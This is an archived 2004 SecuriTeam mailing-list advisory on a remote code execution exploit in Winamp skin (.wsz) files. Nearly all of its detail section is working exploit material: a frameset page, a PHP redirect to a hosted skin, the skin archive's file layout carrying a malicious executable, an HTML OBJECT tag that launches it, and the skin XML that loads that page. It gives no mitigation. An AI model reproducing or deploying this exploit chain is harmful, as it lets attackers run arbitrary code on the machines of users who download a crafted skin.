Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [EXPL] Winamp Skin File (.wsz) Remote Code Execution Exploit |
|---|---|
| Date: | 26 Aug 2004 14:07:11 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Winamp Skin File (.wsz) Remote Code Execution Exploit ------------------------------------------------------------------------ SUMMARY A vulnerability in the way Winamp handles skin files allows a remote attacker who can convince a user to download his skin file to cause the user to unknowingly execute arbitrary code. DETAILS Exploit: index.html < html> < head> </head> < frameset rows="*,1" framespacing="0" border="0" frameborder="NO"> < frame src="load.php" name="frame_content" scrolling="auto" noresize> </frameset> < noframes> < body> </body> </noframes> </html> Load.php < ?php $httpref = $HTTP_REFERER; header("Location: http://URL/foo.wsz"); ?> foo.wsz (foo.zip) /frame/ /maki/ /shade/ /html/ /html/file.exe (malicious file to execute) /html/test.htm (html to load the .exe) /player/ /player/Thumbs.db /xml/ /xml/includes.xml /xml/player-normal.xml /xml/player.xml /skin.xml /html/test.htm < html> < OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='file.exe'> </html> /xml/includes.xml < include file="player.xml"/> /xml/player-normal.xml < layout> < browser id="browser" x="0" y="0" w="0" h="0" relatw="1" relath="1" url="file:///@SKINPATH@html/test.htm" /> </layout> /xml/player.xml < container id="main" name="main"> < include file="player-normal.xml"/> </container> /skin.xml < ?xml version="1.0" encoding="UTF-8" standalone="yes"?> < WinampAbstractionLayer version="1.1"> < skininfo> < version>1.0</version> < name>Batman</name> < comment></comment> < author>Petrol Designs</author> < email>info@petroldesigns.com</email> < homepage>http://www.petroldesigns.com</homepage> </skininfo> < include file="xml/includes.xml"/> < !-- --> </WinampAbstractionLayer> ADDITIONAL INFORMATION The information has been provided by Anonymous. ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [UNIX] Music Daemon DoS and File Disclosure Vulnerabilities, SecuriTeam |
|---|---|
| Next by Date: | [UNIX] CDE LibDtHelp LOGNAME Buffer Overflow Vulnerability, SecuriTeam |
| Previous by Thread: | [UNIX] Music Daemon DoS and File Disclosure Vulnerabilities, SecuriTeam |
| Next by Thread: | [UNIX] CDE LibDtHelp LOGNAME Buffer Overflow Vulnerability, SecuriTeam |
| Indexes: | [Date] [Thread] [Top] [All Lists] |